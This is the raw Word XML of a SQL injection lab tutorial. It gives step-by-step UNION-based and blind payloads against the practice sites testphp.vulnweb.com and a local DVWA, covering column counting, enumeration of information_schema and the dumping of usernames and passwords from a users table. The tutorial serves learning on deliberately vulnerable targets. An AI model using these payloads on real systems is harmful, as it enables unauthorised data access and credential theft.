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4FC" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="00783E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2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="00783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87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNION based SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="004E04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>Find a GET() parameter in the website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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5298357" wp14:editId="34A08B61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1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E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="004E04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>Generate a SQL error to find the database being used by the site :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1’</w:t>
        </w:r>
        <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FECD46E" wp14:editId="4B9E51DB">
              <wp:extent cx="5731510" cy="3222625"/>
              <wp:effectExtent l="0" t="0" r="254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creenshot (118)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222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6D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="004E04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>Find the number number of columns :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 12--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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>if an error pops, it means order value exceeds the no.of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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402626B" wp14:editId="4A86900B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2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E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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6D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 11--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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>if an error doesn’t pop, it means order by value is less or equal to no.of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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0367F5D" wp14:editId="15C0C956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2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E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="004E04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>Find the vulnerable column numbers :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,11--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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6F576C32" wp14:editId="07DE9B2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2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E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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>Which means column 11,7,2,9 are vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="004E04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 xml:space="preserve">Find the database and version : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,database(),3,4,5,6,7,8,version(),10,11--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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CF204D2" wp14:editId="0BAFBAF8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24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E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="004E040B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C278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Find the table name :  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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6D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,table_name from information_schema.tables--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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36E2D771" wp14:editId="376FE131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2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3F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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6473F" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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96473F" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0096473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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CE805F7" wp14:editId="0C39A3C9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2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3F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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6473F" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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96473F" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0096473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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616F6CC2" wp14:editId="0AAC27A6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27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3F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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6473F" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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96473F" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0096473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_name=”users”--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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E966BC2" wp14:editId="0BB0B01F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28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3F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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96473F" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0096473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10, group_concat(uname,0x0a,pass) from users--+</w:t>
      </w:r>
      <w:r w:rsidR="006D69E9"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29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3F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F" w:rsidP="004E040B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96473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F" w:rsidP="00783E60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2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Boolean based SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126E89" w:rsidRPr="00CC2787" w:rsidRDefault="00126E89" w:rsidP="00783E6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162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="00783E60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87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BLIND based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227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26E89" w:rsidRDefault="00F870CF" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r w:rsidR="004E040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=1’&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870CF" w:rsidRDefault="00F870CF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6F4F7D6" wp14:editId="0ED49FD7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5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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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720B8A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’ and 1=1--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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AB47984" wp14:editId="58A6B164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52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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’ and 1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1 order by 3--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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205F78C" wp14:editId="29F68EA7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57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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa/vulnerabilities/sqli/?id=5’ and 1=1 order </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>by 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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10C5B758" wp14:editId="0C175D40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58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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa/vulnerabilities/sqli/?id=5’ and 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select 1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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718EA27" wp14:editId="71DBAD69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159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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa/vulnerabilities/sqli/?id=5’ and 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select database(),version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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40A1DDA4" wp14:editId="1CC0B37F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160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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>elect 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table_name from information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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C874A98" wp14:editId="1D45974A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161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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>table_name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from information_schema.tables--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E040B" w:rsidRDefault="004E040B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01ECCC6" wp14:editId="48A2B600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162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0B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B" w:rsidP="004E04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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_name)</w:t>
      </w:r>
      <w:r w:rsidR="00783E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> from information_schema.columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRDefault="00783E60" w:rsidP="00783E6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F4816BC" wp14:editId="2B9CF23B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163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60" w:rsidRDefault="00783E60" w:rsidP="00783E6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83E60" w:rsidRDefault="00783E60" w:rsidP="00783E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040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,group_concat(column_name) from information_schema.columns</w:t>
      </w:r>
      <w:r>
